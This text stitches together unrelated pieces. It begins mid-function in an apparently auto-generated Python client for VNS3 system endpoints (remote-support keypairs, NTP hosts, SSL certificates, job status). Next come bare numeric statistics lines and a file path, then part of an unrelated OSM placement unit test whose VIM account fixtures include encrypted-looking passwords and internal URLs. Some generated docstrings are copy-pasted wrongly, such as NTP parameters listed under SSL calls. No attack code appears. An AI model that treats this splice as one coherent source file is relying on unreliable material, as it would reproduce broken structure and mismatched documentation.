api_client.call_api( "/system/remote_support/keypair", "POST", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def delete_remote_support_keypair(api_client, **kwargs): # noqa: E501 """Delete Remote Support Keypair # noqa: E501 Deleting remote support keypair with revoke access # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.delete_remote_support_keypair("asdfasd", async_req=True) :param VNS3Client api_client: (required) :param encrypted_passphrase str: Encrypted passphrase string :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/remote_support/keypair", "DELETE", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_system_status(api_client, **kwargs): # noqa: E501 """Get System status # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_system_status(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/status", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_credential_types(api_client, **kwargs): # noqa: E501 """Get system credential types # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_credential_types(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/credential_types", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_credential_type_details(api_client, code, **kwargs): # noqa: E501 """Get credential type details # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_credential_type_details(code, async_req=True) :param VNS3Client api_client: (required) :param code str: Credential type code (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {"code": code} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/credential_types/{code}", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_system_ntp_hosts(api_client, **kwargs): # noqa: E501 """Get NTP hosts for system # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_system_ntp_hosts(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ntp_hosts", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def post_add_ntp_host(api_client, host=None, **kwargs): # noqa: E501 """Add new NTP host to system # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.post_add_ntp_host(host, async_req=True) :param VNS3Client api_client: (required) :param host str: New NTP hostname (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = ["host"] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} for param in [p for p in request_params if local_var_params.get(p) is not None]: body_params[param] = local_var_params[param] # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # HTTP header `Content-Type` header_params["Content-Type"] = api_client.select_header_content_type( # noqa: E501 ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ntp_hosts", "POST", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def delete_ntp_host(api_client, host_id, **kwargs): # noqa: E501 """Remote NTP host # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.delete_ntp_host(host_id, async_req=True) :param VNS3Client api_client: (required) :param host_id int: Index of NTP host in list (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {"host_id": host_id} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ntp_hosts/{host_id}", "DELETE", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def delete_ssl_install(api_client, **kwargs): # noqa: E501 """Uninstall SSL # noqa: E501 Delete SSL certs and remove from HTTP endpoints # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.delete_ssl_install(host_id, async_req=True) :param VNS3Client api_client: (required) :param host_id int: Index of NTP host in list (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ssl", "DELETE", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_ssl_install_status(api_client, uuid, **kwargs): # noqa: E501 """Get SSL install Job status (DEPRECATED) # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_ssl_install_status(job_id, async_req=True) :param VNS3Client api_client: (required) :param uuid str: Job ID for SSL installation :param host_id int: Index of NTP host in list (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {"uuid": uuid} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ssl/install/{uuid}", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def put_upload_ssl_certs(api_client, cert=None, key=None, **kwargs): # noqa: E501 """Upload new SSL key/cert pair # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.put_upload_ssl_certs(c, k, async_req=True) :param VNS3Client api_client: (required) :param cert str: New SSL cert (required) :param key str: New SSL key (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = ["cert", "key"] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} for param in [p for p in request_params if local_var_params.get(p) is not None]: body_params[param] = local_var_params[param] # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # HTTP header `Content-Type` header_params["Content-Type"] = api_client.select_header_content_type( # noqa: E501 ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ssl/keypair", "PUT", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def put_install_ssl_certs(api_client, **kwargs): # noqa: E501 """Install SSL key/cert pair # noqa: E501 Assumes SSL cert/key have already been uploaded # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.put_install_ssl_certs(async_req=True) :param VNS3Client api_client: (required) :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/ssl/install", "PUT", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) def get_job_status(api_client, uuid, **kwargs): # noqa: E501 """Get System Job status # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> response = await api.get_job_status(job_id, async_req=True) :param VNS3Client api_client: (required) :param uuid str: Job ID for SSL installation :param async_req bool: execute request asynchronously :param _preload_content: if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. :param _request_timeout: timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. :return: APIResponse or awaitable if async """ local_var_params = locals() request_params = [] collection_formats = {} path_params = {"uuid": uuid} query_params = [] header_params = {} form_params = [] local_var_files = {} body_params = {} # HTTP header `Accept` header_params["Accept"] = api_client.select_header_accept( ["application/json"] ) # noqa: E501 # Authentication setting auth_settings = ["ApiTokenAuth", "basicAuth"] # noqa: E501 return api_client.call_api( "/system/jobs/{uuid}", "GET", path_params, query_params, header_params, body=body_params, post_params=form_params, files=local_var_files, response_type="object", # noqa: E501 auth_settings=auth_settings, async_req=local_var_params.get("async_req"), _return_http_data_only=local_var_params.get( "_return_http_data_only" ), # noqa: E501 _preload_content=local_var_params.get("_preload_content", True), _request_timeout=local_var_params.get("_request_timeout"), collection_formats=collection_formats, ) class SystemApiRouter(VersionRouter): """System configuration such as SSL, NTP hosts and remote support""" function_library = { "get_remote_support_details": {"2.1.1-2.5.4": get_remote_support_details}, "put_remote_support": {"2.1.1-2.5.4": put_remote_support}, "get_remote_support_keypair_details": { "2.1.1-2.5.4": get_remote_support_keypair_details }, "post_generate_remote_support_keypair": { "2.1.1-2.5.4": post_generate_remote_support_keypair }, "delete_remote_support_keypair": {"2.1.1-2.5.4": delete_remote_support_keypair}, "get_system_status": {"2.1.1-2.5.4": get_system_status}, "get_credential_types": {"2.1.1-2.5.4": get_credential_types}, "get_credential_type_details": {"2.1.1-2.5.4": get_credential_type_details}, "get_system_ntp_hosts": {"2.1.1-2.5.4": get_system_ntp_hosts}, "post_add_ntp_host": {"2.1.1-2.5.4": post_add_ntp_host}, "delete_ntp_host": {"2.1.1-2.5.4": delete_ntp_host}, "delete_ssl_install": {"2.1.1-2.5.4": delete_ssl_install}, "get_ssl_install_status": {"2.1.1-2.5.4": get_ssl_install_status}, "put_upload_ssl_certs": {"2.1.1-2.5.4": put_upload_ssl_certs}, "put_install_ssl_certs": {"2.1.1-2.5.4": put_install_ssl_certs}, "get_job_status": {"2.1.1-2.5.4": get_job_status}, }
33.786477
135
0.636639
4,424
37,976
5.169304
0.046338
0.041978
0.053872
0.050549
0.926582
0.911715
0.907998
0.903406
0.894267
0.877432
0
0.017028
0.277833
37,976
1,123
136
33.816563
0.816846
0.43143
0
0.835069
0
0
0.142682
0.038726
0
0
0
0
0
1
0.027778
false
0.003472
0.005208
0
0.064236
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
73cbac45614dde4257332a1ed9fbbf3853ccfac3
49,530
py
Python
osm_pla/test/test_nsPlacementDataFactory.py
TCSOSM-20/PLA
de4f7820a050a7ed18aa93a298c5a59e379e752b
[ "Apache-2.0" ]
null
null
null
osm_pla/test/test_nsPlacementDataFactory.py
TCSOSM-20/PLA
de4f7820a050a7ed18aa93a298c5a59e379e752b
[ "Apache-2.0" ]
null
null
null
osm_pla/test/test_nsPlacementDataFactory.py
TCSOSM-20/PLA
de4f7820a050a7ed18aa93a298c5a59e379e752b
[ "Apache-2.0" ]
null
null
null
# Copyright 2020 ArctosLabs Scandinavia AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or # implied. # See the License for the specific language governing permissions and # limitations under the License. import os import unittest from collections import Counter from pathlib import Path from unittest import TestCase, mock from unittest.mock import call import yaml from osm_pla.placement.mznplacement import NsPlacementDataFactory class TestNsPlacementDataFactory(TestCase): vim_accounts = [{"vim_password": "FxtnynxBCnouzAT4Hkerhg==", "config": {}, "_admin": {"modified": 1564579854.0480285, "created": 1564579854.0480285, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "6beb4e2e-b397-11e9-a7a3-02420aff0008", "RO": "6bcfc3fc-b397-11e9-a7a3-02420aff0008"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "name": "OpenStack1", "vim_type": "openstack", "_id": "92b056a7-38f5-438d-b8ee-3f93b3531f87", "schema_version": "1.1", "vim_user": "admin", "vim_url": "http://10.234.12.47:5000/v3", "vim_tenant_name": "admin"}, {"config": {}, "vim_tenant_name": "osm_demo", "schema_version": "1.1", "name": "OpenStack2", "vim_password": "gK5v4Gh2Pl41o6Skwp6RCw==", "vim_type": "openstack", "_admin": {"modified": 1567148372.2490237, "created": 1567148372.2490237, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "b7fb0034-caf3-11e9-9388-02420aff000a", "RO": "b7f129ce-caf3-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.44:5000/v3", "_id": "6618d412-d7fc-4eb0-a6f8-d2c258e0e900"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack3", "vim_password": "1R2FoMQnaL6rNSosoRP2hw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599746.689582, "created": 1567599746.689582, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "a8161f54-cf0e-11e9-9388-02420aff000a", "RO": "a80b6280-cf0e-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.46:5000/v3", "_id": "331ffdec-44a8-4707-94a1-af7a292d9735"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack4", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.43:5000/v3", "_id": "eda92f47-29b9-4007-9709-c1833dbfbe31"}] vim_accounts_fewer_vims = [{"vim_password": "FxtnynxBCnouzAT4Hkerhg==", "config": {}, "_admin": {"modified": 1564579854.0480285, "created": 1564579854.0480285, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "6beb4e2e-b397-11e9-a7a3-02420aff0008", "RO": "6bcfc3fc-b397-11e9-a7a3-02420aff0008"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "name": "OpenStack1", "vim_type": "openstack", "_id": "92b056a7-38f5-438d-b8ee-3f93b3531f87", "schema_version": "1.1", "vim_user": "admin", "vim_url": "http://10.234.12.47:5000/v3", "vim_tenant_name": "admin"}, {"config": {}, "vim_tenant_name": "osm_demo", "schema_version": "1.1", "name": "OpenStack2", "vim_password": "gK5v4Gh2Pl41o6Skwp6RCw==", "vim_type": "openstack", "_admin": {"modified": 1567148372.2490237, "created": 1567148372.2490237, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "b7fb0034-caf3-11e9-9388-02420aff000a", "RO": "b7f129ce-caf3-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.44:5000/v3", "_id": "6618d412-d7fc-4eb0-a6f8-d2c258e0e900"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack4", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.43:5000/v3", "_id": "eda92f47-29b9-4007-9709-c1833dbfbe31"}] vim_accounts_more_vims = [{"vim_password": "FxtnynxBCnouzAT4Hkerhg==", "config": {}, "_admin": {"modified": 1564579854.0480285, "created": 1564579854.0480285, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "6beb4e2e-b397-11e9-a7a3-02420aff0008", "RO": "6bcfc3fc-b397-11e9-a7a3-02420aff0008"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "name": "OpenStack1", "vim_type": "openstack", "_id": "92b056a7-38f5-438d-b8ee-3f93b3531f87", "schema_version": "1.1", "vim_user": "admin", "vim_url": "http://10.234.12.47:5000/v3", "vim_tenant_name": "admin"}, {"config": {}, "vim_tenant_name": "osm_demo", "schema_version": "1.1", "name": "OpenStack2", "vim_password": "gK5v4Gh2Pl41o6Skwp6RCw==", "vim_type": "openstack", "_admin": {"modified": 1567148372.2490237, "created": 1567148372.2490237, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "b7fb0034-caf3-11e9-9388-02420aff000a", "RO": "b7f129ce-caf3-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.44:5000/v3", "_id": "6618d412-d7fc-4eb0-a6f8-d2c258e0e900"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack4", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.43:5000/v3", "_id": "eda92f47-29b9-4007-9709-c1833dbfbe31"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack3", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://10.234.12.46:5000/v3", "_id": "eda92f47-29b9-4007-9709-c1833dbfbe31"}, {"config": {}, "schema_version": "1.1", "name": "OpenStack5", "vim_password": "6LScyPeMq3QFh3GRb/xwZw==", "vim_type": "openstack", "vim_tenant_name": "osm_demo", "_admin": {"modified": 1567599911.5108898, "created": 1567599911.5108898, "operationalState": "ENABLED", "projects_read": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "deployed": {"RO-account": "0a651200-cf0f-11e9-9388-02420aff000a", "RO": "0a4defc6-cf0f-11e9-9388-02420aff000a"}, "projects_write": ["69915588-e5e2-46d3-96b0-a29bedef6f73"], "detailed-status": "Done"}, "vim_user": "admin", "vim_url": "http://1.1.1.1:5000/v3", "_id": "ffffffff-29b9-4007-9709-c1833dbfbe31"}] def _produce_ut_vim_accounts_info(self, vim_accounts): """ FIXME temporary, we will need more control over vim_urls and _id for test purpose - make a generator :return: vim_url and _id as dict, i.e. extract these from vim_accounts data """ return {_['name']: _['_id'] for _ in vim_accounts} def _adjust_path(self, file): """In case we are not running from test directory, then assume we are in top level directory (e.g. running from tox) and adjust file path accordingly""" path_component = '/osm_pla/test/' real_path = os.path.realpath(file) if path_component not in real_path: return os.path.dirname(real_path) + path_component + os.path.basename(real_path) else: return real_path def _populate_pil_info(self, file): """ Note str(Path()) is a 3.5 thing """ with open(str(Path(self._adjust_path(file)))) as pp_fd: test_data = yaml.safe_load_all(pp_fd) return next(test_data) def _get_ut_nsd_from_file(self, nsd_file_name): """ creates the structure representing the nsd. IMPORTANT NOTE: If using .yaml files from the NS packages for the unit tests (which we do), then the files must be modified with respect to the way booleans are processed at on-boarding in OSM. The following construct in the NS package yaml file: mgmt-network: 'false' will become a boolean in the MongoDB, and therefore the yaml used in these unit test must use yaml tag as follows: mgmt-network: !!bool False The modification also applies to 'true' => !!bool True This will ensure that the object returned from this function is as expected by PLA. """ with open(str(Path(self._adjust_path(nsd_file_name)))) as nsd_fd: test_data = yaml.safe_load_all(nsd_fd) return next(test_data) def _produce_ut_vnf_price_list(self): price_list_file = "vnf_price_list.yaml" with open(str(Path(self._adjust_path(price_list_file)))) as pl_fd: price_list_data = yaml.safe_load_all(pl_fd) return {i['vnfd']: {i1['vim_name']: i1['price'] for i1 in i['prices']} for i in next(price_list_data)} def _produce_ut_vnf_test_price_list(self, price_list): price_list_file = price_list with open(str(Path(self._adjust_path(price_list_file)))) as pl_fd: price_list_data = yaml.safe_load_all(pl_fd) return {i['vnfd']: {i1['vim_name']: i1['price'] for i1 in i['prices']} for i in next(price_list_data)} def test__produce_trp_link_characteristics_link_latency_with_more_vims(self): """ -test with more(other) vims compared to pil """ content_expected = [0, 0, 0, 0, 0, 120, 120, 130, 130, 140, 140, 230, 230, 240, 240, 340, 340, 32767, 32767, 32767, 32767, 32767, 32767, 32767, 32767] nspdf = NsPlacementDataFactory( self._produce_ut_vim_accounts_info(TestNsPlacementDataFactory.vim_accounts_more_vims), self._produce_ut_vnf_price_list(), nsd=None, pil_info=self._populate_pil_info('pil_unittest1_keys.yaml'), pinning=None) pil_latencies = nspdf._produce_trp_link_characteristics_data('pil_latency') content_produced = [i for row in pil_latencies for i in row] 